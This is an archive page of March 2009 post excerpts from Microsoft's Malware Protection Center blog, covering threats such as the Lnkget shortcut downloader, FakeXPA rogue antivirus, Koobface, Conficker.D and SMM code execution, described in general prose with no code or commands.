Microsoft Malware Protection Center

Threat Research & Response Blog

March, 2009

  • %Lnkget%

    What is lnkget? TrojanDownloader:Win32/Lnkget.* is a malicious Windows shortcut. Once executed, it is able to carry out actions like downloading new files (in this case malware). To be successful, it must use only executables that exist by default on any given system. However, the only executable that is really required is cmd.exe. All others can be carried by the shortcut itself. The executables must of course also be command-line executable only and must not have any user interface. One executable...
  • FakeXPA – The Journey Continues

    The big fish is back. Rogue security products have long been targeting Microsoft's Security Center and using other Microsoft imaging or logos to falsely lure users to buy and use their products. We now welcome Symantec, Webroot and Sophos to that esteemed crowd. The new avatar of Win32/FakeXPA (currently as Anti-virus-1 and may soon change) is taking over from the Antivirus2010 sub-variants and bringing on some more aggressive social engineering strategies. The malicious domain keeps on changing...
  • Spam - What the Doctor Ordered?

    Periodically I'll glance into my spam folder within Outlook and see if the messages there deserve this somewhat final resting place. I spotted a number of messages that have a very similar pattern in the message body when viewed in plain-text mode - see if you can spot the pattern too... c'mon, it'll be fun: Ok that was easy, but what I didn't mention until now is that the masked links above are for different Web sites. The subject lines vary as well and usually do not correlate to the...
  • Anti-Social Networking

    The family added to the March MSRT release is Win32/Koobface . This family is not just a worm, but a collection of different components that can each perform a different task. These include downloading, web hosting, password stealing, displaying popups and sending messages to contacts on various social network websites. Currently, the MMPC has observed targeted binaries for: • bebo.com • facebook.com • friendster.com • fubar.com • hi5.com • myspace.com • myyearbook.com • netlog.com • tagged.com...
  • Art History

    So the virus writer SPTH has returned to the scene, in some sense. He has written a DOS virus. And not just any DOS virus. This one is, wait for it, executable ASCII! Yay. His inspiration is apparently the EICAR anti-virus test file, however the only thing that they have in common is that they are both executable ASCII. The EICAR anti-virus test file is so much more than just executable ASCII, and SPTH's virus is so... not that. The EICAR anti-virus test file uses a more restrictive character...
  • Malware Du Jour

    I believe the Internet is pretty awesome. Full of win some might say. Controversial viewpoint I know, but I’m cool like that. Of the many varied side-effects of the Internet, I would argue one of the most interesting (if only from a social-science point of view) is the ability for the Internet to influence people on such a large scale; that trends take hold and spread at a much faster rate than they ever could have before. At one stage in our technological evolution television was the dominating...
  • Automated Vulnerability Analysis

    Last week at CanSecWest I had the pleasure to watch the MMPC’s security research team present on a technology we have been working on to speed the analysis of vulnerabilities. The motivation behind this work is to automate the otherwise laborious process of analyzing exploits, indentifying malicious input bytes quickly, identification of how shell code is executed and, basically, to narrow the search space for further manual analysis. The ability to respond quickly to an emerging threat event is...
  • SMMthing old, SMMthing new

    Another day arrives and, with it, another way to run code. This time, it's executing arbitrary code in System Management Mode (SMM) memory. That sounds kind of exciting, right? A SMM rootkit? Does that mean that we need an anti-malware scanner for SMM memory now? Or will it just fade away? All this and more will be answered shortly. But first... The technique was discovered last year by Loïc Duflot. Loïc has been researching and publishing work on SMM for several years already. The same technique...
  • Information about Worm:Win32/Conficker.D

    Over the past several months, Microsoft has received reports on 4 different variants of the Conficker worm, the latest being Worm:Win32/Conficker.D (also known as Downadup.C, and the subject of a number of recent press articles labeling this variant as Conficker.C; see Win32/Conficker for a chart distinguishing the variants). In response to the previous variants of Conficker (A/B/C), the industry has collaborated to organize a community-based effort to help mitigate and provide relief to the threat...
  • Forget About Internet Threads

    <sarcasm> Admittedly I was worried about it at first </sarcasm> , but now I can "forget about viruses, spyware, identity theft and other Internet threads", according to one rogue security site: Wow, who knew Internet threads (???) could be a problem? (Yes I know it’s a typo!) All of this seemed too good to be true, so I decided to download this one-of-a-kind super-duper threat killer and save myself. At the time of this writing, the installer was 'missing-in-action'. Suffice...